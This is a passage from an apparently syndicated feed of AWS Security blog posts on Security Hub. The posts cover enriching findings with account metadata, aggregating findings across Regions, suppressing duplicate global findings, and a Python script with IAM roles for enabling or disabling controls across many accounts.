    Within few minutes, a new finding will be generated in Security Hub, warning about the unrestricted ingress rule in the TestSecHubEnrichmentSG security group. For any new or updated findings which do not have the UserDefinedFields attribute findingEnriched set to true, the solution will enrich the finding with account related fields in both the Note and UserDefinedFields sections in the Security Hub finding.

    To see and filter the enriched finding

    1. Go to Security Hub and click on Findings on the left-hand navigation.
    2. Click in the filter field at the top to add additional filters. Choose a filter field of AWS Account ID, a filter match type of is, and a value of the AWS Account ID where you created the TestSecHubEnrichmentSG security group.
    3. Add one more filter. Choose a filter field of Resource type, a filter match type of is, and the value of AwsEc2SecurityGroup.
    4. Identify the finding for security group TestSecHubEnrichmentSG with updates to Note and UserDefinedFields, as shown in Figures 4 and 5 below:
      Figure 4: Account metadata enrichment in Security Hub finding’s Note field

      Figure 4: Account metadata enrichment in Security Hub finding’s Note field

      Figure 5: Account metadata enrichment in Security Hub finding’s UserDefinedFields field

      Figure 5: Account metadata enrichment in Security Hub finding’s UserDefinedFields field

      Note: The actual attributes you will see as part of the UserDefinedFields may be different from the above screenshot. Attributes shown will depend on your tagging configuration and the alternate contact configuration. At a minimum, you will see the AccountName and OU fields.

    5. Once you confirm that the solution is working as expected, delete the stand-alone security group TestSecHubEnrichmentSG, which was created for testing purposes.

    Create custom insights using the enriched attributes

    You can use the attributes available in the UserDefinedFields in the Security Hub finding to filter the findings. This lets you generate custom Security Hub Insight and reports tailored to suit your organization’s needs. The example shown in Figure 6 below creates a custom Security Hub Insight for findings grouped by severity for a specific owner, using the Owner attribute within the UserDefinedFields object of the Security Hub finding.

    Figure 6: Custom Insight with Account metadata filters

    Figure 6: Custom Insight with Account metadata filters

    Event Bridge rule for response or remediation action using enriched attributes

    You can also use the attributes in the UserDefinedFields object of the Security Hub finding within the EventBridge rule to take specific response or remediation actions based on values in the attributes. In the example below, you can see how the Environment attribute can be used within the EventBridge rule configuration to trigger specific actions only when value matches PROD.

    {
      "detail-type": ["Security Hub Findings - Imported"],
      "source": ["aws.securityhub"],
      "detail": {
        "findings": {
          "RecordState": ["ACTIVE"],
          "UserDefinedFields": {
            "Environment": "PROD"
          }
        }
      }
    }

    Conclusion

    This blog post walks you through a solution to enrich AWS Security Hub findings with AWS account related metadata using Amazon EventBridge notifications and AWS Lambda. By enriching the Security Hub findings with account related information, your security teams have better visibility, additional insights and improved ability to create targeted reports for specific account or business teams, helping them prioritize and improve overall security response. To learn more, see:

 
If you have feedback about this post, submit comments in the Comments section below. If you have any questions about this post, start a thread on the AWS Security Hub forum.

Want more AWS Security news? Follow us on Twitter.

Siva Rajamani

Siva Rajamani

Siva Rajamani is a Boston-based Enterprise Solutions Architect at AWS. Siva enjoys working closely with customers to accelerate their AWS cloud adoption and improve their overall security posture.

Prashob Krishnan

Prashob Krishnan

Prashob Krishnan is a Denver-based Technical Account Manager at AWS. Prashob is passionate about security. He enjoys working with customers to solve their technical challenges and help build a secure scalable architecture on the AWS Cloud.

Best practices for cross-Region aggregation of security findings

Post Syndicated from Marshall Jones original https://aws.amazon.com/blogs/security/best-practices-for-cross-region-aggregation-of-security-findings/

AWS Security Hub enables customers to have a centralized view into the security posture across their AWS environment by aggregating your security alerts from various AWS services and partner products in a standardized format so that you can more easily take action on them. To facilitate that central view, Security Hub allows you to designate an aggregation Region, which links some or all Regions to a single aggregated Region in a delegated administrator AWS account. All your findings across all of your accounts and all of your linked Regions will be processed by Security Hub in this one Region. With this feature, you can take advantage of many configurations when ingesting findings into Security Hub, that will benefit you operationally and provide cost savings.

This blog post provides you with a set of best practices when using Security Hub across multiple Regions. After implementing the recommendations in this blog post, you’ll have an optimized and centralized view of Security Hub findings from all integrated AWS services and partner products across all Regions in a single AWS account and Region.

Enable cross-Region aggregation

To enable cross-Region aggregation in Security Hub, you must first enable finding aggregation in Security Hub from the Region that will become the aggregation Region. You cannot use a Region that is disabled by default as your aggregation Region. For a list of Regions that are disabled by default, see Enabling a Region in the AWS General Reference.

You can enable AWS Security Hub finding aggregation using either the console or CLI. You must enable finding aggregation from the Region that will be the aggregation Region.

To enable Security Hub finding aggregation from the console

To enable AWS Security Hub finding aggregation using the AWS console:

  1. Start by navigating to the AWS Security Hub console and select Settings on the left side of the screen. Once on the settings page, choose the Regions tab.
Figure 1. Enabling finding aggregation

Figure 1. Enabling finding aggregation

  1. Check the checkbox to Link future Regions. As AWS releases new Regions, their results will automatically be aggregated into your designated Region. If this checkbox is not checked, any new Region that is released will not aggregate Security Hub findings to the aggregation Region.

To enable Security Hub finding aggregation using the CLI

Alternatively, you can enable AWS Security Hub finding aggregation using the CLI by using the following command:

aws securityhub create-finding-aggregator –region <aggregation Region> –region-linking-mode ALL_REGIONS | ALL_REGIONS_EXCEPT_SPECIFIED | SPECIFIED_REGIONS –regions <Region list>

Here’s a sample CLI command to enable AWS Security Hub finding aggregation:

aws securityhub create-finding-aggregator –region us-east-1 –region-linking-mode SPECIFIED_REGIONS –regions us-west-1,us-west-2

For more details around AWS Security Hub cross-region aggregation, see Aggregating findings across regions.

Consolidating downstream SIEM and ticketing integrations

Security Hub findings for all AWS accounts in your environment should be integrated into a Security Information and Event Management (SIEM) solution, such as Amazon OpenSearch Service or an APN partner SIEM, or a standardized ticketing system such as JIRA or ServiceNow.

You should send all Security Hub findings to a SIEM or ticketing solution from a single aggregation point to simplify operational overhead. Although integration architectures vary, as an example, this might mean configuring an Amazon EventBridge rule to parse and send findings to AWS Lambda or Amazon Kinesis for a custom integration point with the SIEM or ticketing solution.

You should to configure this integration point in a single delegated administrator account across all member AWS accounts and aggregated Regions. You should avoid having multiple integration points between each Security Hub Region and your SIEM or ticketing solution to avoid unnecessary operational overhead and costs of managing multiple integration points and resources required to stream findings to your SIEM.

Collecting Security Hub findings in a SIEM or ticketing solution can help you correlate findings across many other logs sources. For example, you might use a SIEM solution to analyze operating system logs from an Amazon Elastic Compute Cloud (Amazon EC2) instance to correlate with GuardDuty findings collected by Security Hub to investigate suspicious activity. You could also use ServiceNow or JIRA to create an automated, bidirectional integration between these ticketing solutions that keeps your Security Hub findings and issues in sync.

Auto-archive GuardDuty findings associated with global resources

Amazon GuardDuty creates findings associated with AWS IAM resources. IAM resources are global resources, which means that they are not Region-specific. If GuardDuty generates a finding for an IAM API call that is not Region-specific, such as ListGroups (for example, PenTest:IAMUser/KaliLinux) that finding is created in all GuardDuty Regions and ingested into Security Hub in every Region. You want to implement suppression rules in GuardDuty so that you don’t have multiple copies of this finding in your Security Hub delegated administrator account finding aggregation Region.

To implement AWS GuardDuty suppression rules (Console)

To reduce the duplication of findings in Security Hub, suppress global GuardDuty findings in all Regions except the Security Hub aggregation Region. For example, if you are aggregating Security Hub findings in us-east-1 and your environment uses all commercial AWS Regions in the United States, you would add a suppression rule in GuardDuty in us-east-2, us-west-1, and us-west-2.

To create AWS GuardDuty suppression rules using the AWS console:

  1. Navigate to the GuardDuty console and select the Findings link on the left side of the screen.
Figure 2. Creating GuardDuty suppression rules

Figure 2. Creating GuardDuty suppression rules

  1. Filter to search for the findings you want to suppress, and click Save / edit in the search bar.
  2. Enter a name and description for the suppression rule and save it.

To implement AWS GuardDuty suppression rules (CLI)

Alternatively, you can create AWS GuardDuty suppression rules using the CreateFilter API via CLI.

  1. Create a JSON file with your desired suppression filter criteria for the suppression rule.
  2. The following CLI command will test your filter criteria for AWS GuardDuty findings that will be suppressed:
  3. aws guardduty list-findings –detector-id 12abc34d567e8fa901bc2d34e56789f0 –finding-criteria file://criteria.json

  4. The following CLI command will create a filter for AWS GuardDuty findings that will be suppressed:
  5. aws guardduty create-filter –action ARCHIVE –detector-id 12abc34d567e8fa901bc2d34e56789f0 –name yourfiltername –finding-criteria file://criteria.json

For more details for creating AWS GuardDuty suppression rules, see Creating AWS GuardDuty suppression rules.

Reduce AWS Config cost by recording global resources in one Region

Like GuardDuty, AWS Config also records supported types of global resources, which are not tied to a specific Region and can be used in all Regions. The global resource types that AWS Config supports are IAM users, groups, roles, and customer managed policies. The configuration details for a specific global resource are the same in all Regions. If you have AWS Security Hub AWS Foundational Best Practices enabled, the feature has certain checks for global resources in AWS Config that you need to disable in all Regions except the aggregated Region.

Customize AWS Config for global resources

If you customize AWS Config in multiple Regions to record global resources, AWS Config creates multiple configuration items each time a global resource changes, one configuration item for each Region. Costs for each configuration item can be found on AWS Config pricing. These configuration items will contain identical data. To prevent duplicate configuration items, consider customizing AWS Config in only one Region to record global resources, unless you want those configuration items to be available in multiple Regions. See this blog post for a comprehensive list of additional AWS Config best practices.

To customize AWS Config for global resources (Console)

Follow the steps below to change the AWS Config global resource configuration in the AWS Console.

  1. Navigate to the AWS Config console and select Settings on the left side of the screen
  2. Click Edit in the top right corner
  3. Uncheck the Include global resources checkbox.
  4. Repeat these steps for each Region AWS Config is enabled, except the Region where you would like to track global resources.
Figure 3. AWS Config global resource setting

Figure 3. AWS Config global resource setting

To customize AWS Config for global resources (CLI)

Alternatively, you can disable the global resource tracking in AWS Config using the CLI.

aws configservice put-configuration-recorder –configuration-recorder name=default,roleARN=arn:aws:iam::123456789012:role/config-role –recording-group allSupported=true,includeGlobalResourceTypes=false

If you have deployed AWS Config using these CloudFormation templates, you would set the IncludeGlobalResourceTypes to False under the AWS::Config::ConfigurationRecorder for the Regions you do not want to track global resources, and set the value to True in the aggregated Region where you would like to use to track global resources. You can use the CloudFormation StackSets multiple AWS Region deployment feature to deploy the CloudFormation template in all AWS Regions where AWS Config is enabled.

For more details for AWS Config global resources, see Selecting AWS Config resources to record.

Disable AWS Security Hub AWS Foundational Best Practices periodic controls associated with global resources

AWS Security Hub AWS Foundational Best Practices perform checks against the resources in your AWS environment utilizing AWS Config rules. After you have disabled the AWS Config global resources in all Regions except for the Region that runs global recording, disable the Security Hub controls that deal with global resources as shown in Figure 5 below.

You can disable AWS Security Hub controls relating to global resources using the console or CLI.

To disable AWS Security Hub controls (Console)

Follow the steps below to disable Security Hub controls that deal with global resources in the AWS Console.

  1. Navigate to the Security Hub console and select Security Standards on the left side of the screen.
  2. Click on the AWS Foundation Security Best Practices v.1.0.0 security standard.
  3. Then use the filter box to search for IAM. Now you should be able to see security controls IAM.1-IAM.7, which are Security Hub global controls.
  4. Figure 4. Security Hub global controls

    Figure 4. Security Hub global controls

  5. Click on each control and select Disable in the top right corner
  6. After you have disabled resources, add a reason for disabling and choose Disable.
Figure 5. Disabling Security Hub control

Figure 5. Disabling Security Hub control

To disable AWS Security Hub controls (CLI)

Alternatively, you can disable Security Hub controls that deal with global resources using the CLI.

aws securityhub update-standards-control –standards-control-arn <control ARN> –control-status “DISABLED” –disabled-reason <description of reason to disable>

This sample CLI command disables Security Hub controls that deal with global resources:

aws securityhub update-standards-control –standards-control-arn “arn:aws:securityhub:us-east-1:123456789012:control/aws-foundational-security-best-practices/v/1.0.0/ACM.1” –control-status “DISABLED” –disabled-reason “Not applicable for my service”

You can also follow instructions to implement a solution to disable specific Security Hub controls for multiple AWS accounts.

Be sure to only disable the Security Hub controls in the Regions where global recording is also disabled. Verify the Security Hub controls associated with global resources are enabled in the same Region where AWS Config global resources are enabled.

After you have completed disabling these controls and recording of global resources, proceed to disable the [Config.1] AWS Config should be enabled control. This specific control requires recording of global resources in order to pass, which is not required to have enabled in multiple Regions.

For more details for AWS Security Hub controls, see Disabling and enabling individual AWS Security Hub controls .

Implement automatic remediation from a central Region

Once findings are consolidated and ingested into Security Hub across all your organization’s AWS accounts, you should implement auto-remediation where possible, including everything from resource misconfigurations to automated quarantine of infected EC2 instances. Security Hub provides multiple ways to achieve this through end-to-end automation with EventBridge or through human-triggered automation with Security Hub Custom Actions. You can deploy automatic remediation solutions in a single Region to perform cross-Region remediation. This helps you deploy fewer resources, saving money and operational overhead. For more information on how to enable the solution for Security Hub Automated Response and Remediation, see this blog post.

If you have automation currently in place, it’s important to understand how findings from multiple Regions triggering your automation might be affected. For example, you might have a Lambda function that remediates problems with S3 buckets, where it assumes it is being invoked in the same Region as the S3 bucket it needs to remediate. With cross-Region aggregation, your Lambda might need to make a cross-Region AWS SDK call. The Lambda function will run in the Region where the aggregation occurs, but the bucket could be in another Region, so you might have to adjust your function to handle that situation. Also, the role associated with the Lambda function could have its privileges limited to a single Region. If you intend the same function to work in all Regions, you might need change the IAM policy for the IAM role used by the Lambda. Make sure to check Service Control Policies in AWS Organizations, if you use them, because they can also deny actions in one Region while allowing them in another Region.

When enabling cross-Region finding aggregation, you’ll need to understand how any automatic remediation that might be in place today could be affected. Be sure to test your remediation functions on resources in various Regions, to be sure remediation works in all Regions you monitor.

Conclusion

This blog post highlights configurations you can take advantage of to reduce operational overhead and provide cost savings by using cross-Region finding aggregation in Security Hub. The examples given apply to the majority of AWS environments, and are meant to be action items you can use to improve the overall security and operational effectiveness of your AWS environment.

If you have feedback about this post, submit comments in the Comments section below. If you have any questions about this post, start a thread on the re:Post forum.

Want more AWS Security news? Follow us on Twitter.

Author

Marshall Jones

Marshall is a Worldwide Security Specialist Solutions Architect at AWS. His background is in AWS consulting and security architecture, focused on a variety of security domains including edge, threat detection, and compliance. Today, he is focused on helping enterprise AWS customers adopt and operationalize AWS security services to increase security effectiveness and reduce risk.

Author

Jonathan Nguyen

Jonathan is a Shared Delivery Team Senior Security Consultant at AWS. His background is in AWS Security with a focus on Threat Detection and Incident Response. Today, he helps enterprise customers develop a comprehensive AWS Security strategy, deploy security solutions at scale, and train customers on AWS Security best practices.

Disabling Security Hub controls in a multi account environment

Post Syndicated from Priyank Ghedia original https://aws.amazon.com/blogs/security/disabling-security-hub-controls-in-a-multi-account-environment/

In this blog post, you’ll learn about an automated process for disabling or enabling selected AWS Security Hub controls across multiple accounts and multiple regions. You may already know how to disable Security Hub controls through the Security Hub console, or using the Security Hub update-standards-control API. However, these methods work on a per account and per region basis. If you want to tune your posture by disabling some controls across multiple accounts, this automated approach makes it easier.

The update Security Hub controls script provided in this post uses cross account access to disable or enable several controls across multiple accounts and multiple Regions on an ad hoc basis, without having to maintain resources in each Region. These accounts can be individual accounts where Security Hub is managed independently per account, part of a Security Hub administrator setup, or a combination of these. You will need to execute this script in newly added AWS accounts again to keep the controls status consistent for new accounts.

This blog also describes an alternative solution which automates updating Security Hub controls on a schedule for any new AWS accounts that are added, and keeps the control status in member accounts consistent with the controls status in the Security Hub administrator account. The alternate solution will only work if you use Security Hub administrator setup, and must be deployed on a per Region basis.

Why disable controls?

Security Hub generates findings from continuous checks against a set of rules from supported security standards. These checks provide a readiness score and identify specific accounts and resources that require attention.

It can be useful to turn off security checks for controls that are not relevant to your environment. Disabling irrelevant controls makes it easier to identify the important findings that you can take action on.

Reasons to disable controls

There are several reasons you may choose to disable controls:

  • Controls for unused services
  • Controls using global resources
  • Controls with compensating controls

Unused services

If you are not using the specific AWS service for which a control is enabled, you may want to disable controls that have periodic checks associated with that service.

Note: Periodic checks run automatically every 12 hours, whereas change-triggered checks run when the associated resource changes state. Change-triggered checks do not run if the associated in scope resource does not exist, so you do not have to disable controls that explicitly use change-triggered checks.

For example, SageMaker.1 is a control that has a periodic check and is part of the AWS Foundational Security Best Practices standard. If you do not use Amazon SageMaker in your environment, you can disable this check temporarily. If you disable an unused check and later start using the service in the future, you must enable the check again. You should perform regular analysis of services in use across your AWS Accounts.

Global resources

Global resources, such as AWS Identity and Access Management (IAM), generate findings in each region where you have Security Hub enabled. To focus only on meaningful findings, you can disable controls for global resources in all but one Region. You will have to align the desired region to be the same Region in AWS Config where global recording is enabled. A list of all such controls for each standard are as follows:

Compensating controls

You may want to disable a Security Hub control for which a compensating control is in place. For example, the AWS Foundational Security Best Practices control CloudTrail.5 checks to see if AWS CloudTrail is configured to send logs to Amazon CloudWatch logs. You can disable this check if you are sending CloudTrail to another destination, such as Amazon Simple Storage Service (Amazon S3) or partner tools such as a SIEM solution. Another example is CIS 3.x controls. GuardDuty can be considered a compensating control instead of CloudWatch alarms for CIS 3.1, 3.2, 3.3, 3.4, 3.5, 3.6, 3.7, 3.8, 3.9, 3.10, 3.11, 3.12, 3.13, and 3.14

Solution overview:

The update Security Hub controls script shown below is written in Python. It uses AWS SDK for Python (Boto3) to assume a cross account IAM role in the accounts passed in the script, and uses the update-standards-control Security Hub API to enable or disable controls. You must deploy this solution in a single AWS Region.

We will review the prerequisites in the next section to understand the requirements for successfully using this solution. We will then walk through the instructions for deploying this automation through an Amazon Elastic Compute Cloud (Amazon EC2) instance along with examples of how to use the script.

Note: You can also use your local machine (customer device) or AWS Cloudshell if you meet the prerequisites described below.

Prerequisites:

The update Security Hub controls script shown below requires:

  • An IAM role for cross-account access. You should have an IAM principal able to assume an IAM role in accounts where Security Hub controls needs to be disabled or enabled. This role should have securityhub:UpdateStandardsControl permission.

    Note: If you used the Security Hub multiaccount scripts from awslabs to enable Security Hub for multiple accounts you can use the role provided in the repository for the purpose of this blog as it has the necessary permissions.

  • AWS CLI
  • Python
  • Boto3

Update security hub controls script

Let’s review the arguments the script uses to run successfully. There are both required arguments and optional arguments:

Required arguments

–input-file
Path to a CSV file containing a list of the 12 digit AWS account IDs whose controls you want to disable or enable. If you are using Security Hub administrator account, use the list-members API to generate a list of all accounts where security hub is enabled. Store this list in a CSV file, one account ID per line.

–assume-role
Role name of the execution role in each account. This role should have the securityhub:UpdateStandardsControl permission. If you will be using the sample execution role CloudFormation provided in Part B—Execution role, the name of this role is ManageSecurityHubControlsExecutionRole.

–regions
Comma separated list of Regions to update SecurityHub controls. Do not add any spaces after each comma. Specify ALL to consider all Regions where Security Hub is available. If you list a Region where you have not enabled Security Hub, the script will skip this Region and log the failure.

–standard
Enter the standard code (AFSBP, CIS, PCIDSS).
AFSBP for AWS Foundational Security Best Practices
CIS for CIS AWS Foundations
PCIDSS for Payment Card Industry Data Security Standard (PCI DSS)

The script works with one Security Hub Standard at a time. For example, you can only disable AFSBP controls in the first run of the script. If you want to disable multiple controls across AFSBP and CIS standards you must run the script twice, once for AFSBP and once for CIS controls.

–control-id-list
Comma separated list of controls, example for CIS, enter – (1.1,1.2) or for PCIDSS enter – (PCI.AutoScaling.1,PCI.CloudTrail.4)

Do not add any spaces after each comma. Control IDs can be found from the Security Hub console: Security Standards > View results > ID column in the enabled controls table. You can also find the control IDs in the Security Hub controls documentation for each standard.

Figure 1: Sample Control IDs of PCI security standards shown in console

Figure 1: Sample Control IDs of PCI security standards shown in console

–control-action
For enabling controls use ENABLED; for disabling controls use DISABLED.

–disabled-reason
Reason for disabling the controls. This text will appear in the Security Hub console for the disabled controls, it is used to understand why the control is disabled for reviews in the future. If your script uses different reasons for disabling controls, you need to run the script multiple times, once for each disable reason. This argument is NOT required (or used) for enabling controls.

Optional arguments

-h, –help
shows the help message and exit

–profile
If this argument is not given, the default profile will be used. Use this argument to parse the named profile. The credentials in this profile should have permissions to assume the execution role in each account.

Solution deployment

We are using an Amazon EC2 instance with Amazon Linux 2 (AL2) to run this automation. We will create the instance role for the EC2 in Part A, create the execution role in Part B, and launch the EC2 instance to run the Update Security Hub controls script in Part C.

Note: For the purpose of this blog, we will be creating the EC2 instance and the instance role in the Security Hub administrator account, however this is not a requirement. If you have existing cross account roles with the necessary permissions, you can use these existing roles as well.

Part A–Security Hub controls manager EC2 role

This role should have permission to assume (sts:AssumeRole) the execution role described in Part B.

Figure 2: Amazon EC2 Instance role assumes cross account IAM role

Figure 2: Amazon EC2 Instance role assumes cross account IAM role

A sample policy for this role is provided below. This policy limits the Security Hub controls manager EC2 role to assume only a specific execution role in the downstream accounts:

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Action": "sts:AssumeRole",
            "Resource": "arn:aws:iam::*:role/ManageSecurityHubControlsExecutionRole"
        }
    ]
}

To create the SHControlsManagerEC2 role

  1. Navigate to the IAM console of the Security Hub administrator account. You must have permission to launch an EC2 instance in this account.
  2. Create a new policy using JSON policy editor, and name it SHAssumeRolePolicy.
  3. Copy the sample policy shown above and paste it into your new policy in the JSON editor. The resource in the policy is the execution role, as will be described in Part B—Execution role below.

    Note: If you are using an existing role as the execution role, rather than creating a new role as shown in Steps 1-4, then you will need to change the resource section of the sample code in Figure 2 to use the ARN of the existing execution role.

  4. In the IAM console, Create an IAM role for EC2 and name it SHControlsManagerEC2. Assign the following policies:
    1. The SHAssumeRolePolicy policy you created in step 2.
    2. The AmazonSSMManagedInstanceCore managed policy for managing the instance using AWS Systems Manager.
    3. The AWSSecurityHubReadOnlyAccess managed policy for allowing read only access to Security Hub.

    Figure 3: IAM policies attached to Amazon EC2 Instance role

    Figure 3: IAM policies attached to Amazon EC2 Instance role

  5. When you are finished creating the role, note the Amazon Resource Name (ARN) – you will be using it in Part B. The ARN will look like Figure 4: arn:aws:iam::111111222222:role/SHControlsManagerEC2

    Figure 4: ARN of the Amazon EC2 instance role

    Figure 4: ARN of the Amazon EC2 instance role

Part B–Execution role

The execution role must be created in all accounts where you will be disabling or enabling controls. This role should have securityhub:UpdateStandardsControl permission. The execution role trust relationship should allow the Security Hub controls manager role to assume the execution role.

Important: The name of the execution role must be identical in each account (including the Security Hub administrator account), otherwise the script will NOT work.

If you are using AWS Organizations, you can use CloudFormation StackSets to deploy this execution role easily across all of your accounts. The stack set runs across the organization at the root or organizational units (OUs) level of your choice. The CloudFormation will use the ARN you noted from Security Hub controls manager EC2 role as a parameter.

Sample execution role policy

A sample policy for the execution role is provided below:

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Action": "securityhub:UpdateStandardsControl",
            "Resource": "arn:aws:securityhub:*:*:hub/default"
        }
    ]
}

Sample execution role trust policy

Note: the ARN in the principal section below should be the ARN you noted in step 5 of Part A: Security Hub controls manager EC2 role.

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": {
        "AWS": "arn:aws:iam::111111222222:role/SHControlsManagerEC2"
      },
      "Action": "sts:AssumeRole"
    }
  ]
}

To launch the stack set for creating cross account IAM Roles

  1. Login to the console of the Organizations management account or CloudFormation delegated administrator account.
  2. Select StackSet and choose Create StackSet
  3. Choose template is ready, and select template source as Amazon S3 URL
  4. Enter the following URL, then click next: https://awsiammedia.s3.amazonaws.com/public/sample/1083-disabling-security-hub-controls-multi-account/aws-securityhub-updatecontrols-executionrole.yml

    Figure 5: Create a AWS CloudFormation StackSet

    Figure 5: Create a AWS CloudFormation StackSet

  5. Enter a stack name, update description as needed and then under parameters enter the ARN of the Security Hub controls manager EC2 role used in step 5 of Part A–Security Hub controls manager EC2 role, then choose Next.

    Figure 6: AWS CloudFormation StackSet parameters for creating cross account IAM role

    Figure 6: AWS CloudFormation StackSet parameters for creating cross account IAM role

  6. (Optional) On the Configure StackSet options page, go to Tags and add tags to identify and organize your stack set.

    Figure 7: Optionally define tags for the stacks created using AWS CloudFormation StackSet

    Figure 7: Optionally define tags for the stacks created using AWS CloudFormation StackSet

  7. On the Set deployment options page, select the desired Region. Since the resource being created is IAM, you will only need to specify one Region. Choose Next.

    Figure 8: Specify target regions where the CloudFormation stacks need to be created

    Figure 8: Specify target regions where the CloudFormation stacks need to be created

  8. Review the definition and select I acknowledge that AWS CloudFormation might create IAM resources. Choose Submit.
  9. You can monitor the creation of the stack set from the Operations tab to ensure that deployment is successful.

Note: StackSets does not deploy stack instances to the organization’s management account, even if the management account is in your organization or in an OU in your organization. You will need to create the execution role manually in the organization management account.

Part C–Launch EC2

We will be using a t2.micro EC2 instance with Amazon Linux 2 (AL2) image which comes preinstalled with AWS CLI and Python. This instance size and image are free tier eligible.

To launch the EC2 instance for executing securityhub-updatecontrols-script

  1. Launch EC2 instance in the Security Hub administrator account in a single Region. You can use any Region.
  2. Attach the IAM role to the instance as created in part A.
  3. Confirm instance is in a running state.
  4. Login to the instance CLI using AWS Systems Manager Session Manager. Go to the EC2 console, select the instance and choose Connect.

    Figure 9: Access newly launched Amazon EC2 instance using session manager

    Figure 9: Access newly launched Amazon EC2 instance using session manager

    Note: You will need to allow outbound internet access to systems manager endpoints for session manager to work. See session manager documentation for more information.

  5. On the next page, choose Connect again.

    Figure 10: Connect to Amazon EC2 instance

    Figure 10: Connect to Amazon EC2 instance

  6. A new window with session manager will open.
  7. Set the working directory to home directory.
     cd /home/ssm-user
  8. Install Git:
     sudo yum install git
  9. Clone the UpdateSecurityHubControls code repository.
     git clone https://github.com/aws-samples/SecurityHub-Multiaccount-UpdateControls.git
  10. Start a virtual environment.
     python3 -m venv SecurityHub-Multiaccount-UpdateControls/env
     source SecurityHub-Multiaccount-UpdateControls/env/bin/activate
  11. Upgrade pip and Install boto3
     pip install pip --upgrade
     pip install boto3

You are now ready to run the script.

Example 1–Disabling Controls

Let’s assume you have Config global recording enabled in us-east-1 and want to disable controls associated with global resources (IAM.1, IAM.2, IAM.3, IAM.4, IAM.5, IAM.6, IAM.7) for AWS Foundational Security Best Practices standard in Regions us-west-1, us-east-2 in all accounts. The name of our execution role in all accounts is ManageSecurityHubControlsExecutionRole

  1. Change to the correct directory
    $ cd SecurityHub-Multiaccount-UpdateControls
  2. Create a file with the list of account IDs. This is passed with the input-file argument.
    $ nano accounts.csv
  3. Enter account IDs one account per line, then save the file.

    Figure 11: CSV file with AWS account IDs

    Figure 11: CSV file with AWS account IDs

  4. Run the script:
     python SH-UpdateControls.py \
    --input-file accounts.csv \
    --assume-role ManageSecurityHubControlsExecutionRole \
    --regions us-east-2,us-west-1 \
    --standard AFSBP \
    --control-id-list IAM.1,IAM.2,IAM.3,IAM.4,IAM.5,IAM.6,IAM.7 \
    --control-action DISABLED \
    --disabled-reason 'Disabling IAM checks in all regions except for us-east-1, as global recording is enabled in us-east-1'
    
  5. As the script runs, it generates a summary of disabled controls. If there are failures, the reason for failures will be listed in the summary. A log file is also saved in the directory with execution logs.

    Figure 12: Execution Summary showing successful updates and failure information

    Figure 12: Execution Summary showing successful updates and failure information

Example 2–Enabling Controls

Let’s say you have disabled Control IDs PCI.CodeBuild.1 and PCI.CodeBuild.2 from the PCI standard in your accounts, as in the past, you did not use AWS CodeBuild in your PCI environment.

After a recent architecture review, you decided to begin using CodeBuild in your accounts in us-west-1, eu-west-1, ap-southeast-1. The name of our execution role in all accounts is ManageSecurityHubControlsExecutionRole.

  1. Confirm you have completed all steps in part C.
  2. Change to the correct directory.
    $ cd SecurityHub-Multiaccount-UpdateControls
  3. Create a file with the list of account IDs. This will be passed with the input-file argument.
    $ nano accounts.csv
    Enter account IDs one account per line, then save the file.

    Figure 13: CSV file with AWS account IDs

    Figure 13: CSV file with AWS account IDs

  4. Run the script to enable controls
     python SH-UpdateControls.py \
    --input-file accounts.csv \
    --assume-role ManageSecurityHubControlsExecutionRole \
    --regions us-west-1,eu-west-1,ap-southeast-1 \
    --standard PCIDSS \
    --control-id-list PCI.CodeBuild.1,PCI.CodeBuild.2 \
    --control-action ENABLED \
    
  5. As the script runs, it generates a summary of enabled controls. If there are failures the reason for failures will be listed in the summary A log file is also saved in the directory with execution logs.

    Figure 14: Execution Summary showing controls enabled

    Figure 14: Execution Summary showing controls enabled

Alternative Solution

Consider a case where new member accounts are being added to the Security Hub administrator of the organization. In such a scenario, you would have to disable the controls manually, or by re-running the update Security Hub controls script in each new account.

Figure 15: High level architecture

Figure 15: High level architecture

This alternative solution addresses this problem by automating the process with AWS Step Functions and a scheduled EventBridge event. A state machine is triggered every 24 hours, which updates the status of the standard controls in all AWS accounts registered as members in the Security Hub administrator account. This solution maintains a list of account IDs within a DynamoDB table, for which exceptions can be made. For details on how to deploy and use this solution, refer to this GitHub repository. This alternative solution and the update SecurityHub controls script are independent of each other.

Conclusion

In this blog, you learned some of the reasons you might disable Security Hub controls. We showed how the controls can quickly be disabled or enabled using the update Security Hub controls script provided. This script will save you time if you want to update controls across multiple accounts and multiple Regions on an as needed basis.

We also introduced an alternative solution which uses AWS Step Functions and a scheduled CloudWatch event to update Security Hub controls in new accounts on a regular basis. You could use either of the two solutions depending on the scenario.

If you have feedback about this post, submit comments in the Comments section below. If you have trouble with the scripts, please open an issue in GitHub.

 
If you have feedback about this post, submit comments in the Comments section below.

Want more AWS Security news? Follow us on Twitter.

Priyank Ghedia

Priyank Ghedia

Priyank is a Solutions Architect focussed on Threat Detection and Incident Response. Priyank helps customers meet their security visibility and response objectives by building architectures using AWS security services and tools. Before AWS, he spent 8 years advising customers on global networking and security operations.

Praveen Haranahalli

Praveen Haranahalli

Praveen Haranahalli is a Solutions Architect at AWS, based in Orlando, Florida. Praveen has helped a diverse set of customers to design and operate a broad variety of workloads using AWS Services and has a keen interest in Security and Governance. Outside of work, he loves being outdoor with his family.

Ahmed Bakry

Ahmed Bakry

Ahmed Bakry is a Security Consultant at AWS Professional Services and based in Amsterdam. He obtained his master’s degree in Computer Science at the University of Twente and specialized in Cyber Security. And he did his bachelor degree in Networks Engineering at the German University in Cairo. His passion is developing secure and robust applications that drive success for his customers.

Michael Fuellbier

Michael Fuellbier

Michael Fuellbier is a Security Consultant at AWS Professional Services. His passion is designing and building secure and robust applications together with his customers. He studied mathematics and has a background in penetration testing.

Automatically resolve Security Hub findings for resources that no longer exist

Post Syndicated from Kris Normand original https://aws.amazon.com/blogs/security/automatically-resolve-security-hub-findings-for-resources-that-no-longer-exist/

In this post, you’ll learn how to automatically resolve AWS Security Hub findings for previously deleted Amazon Web Services (AWS) resources. By using an event-driven solution, you can automatically resolve findings for AWS and third-party service integrations.

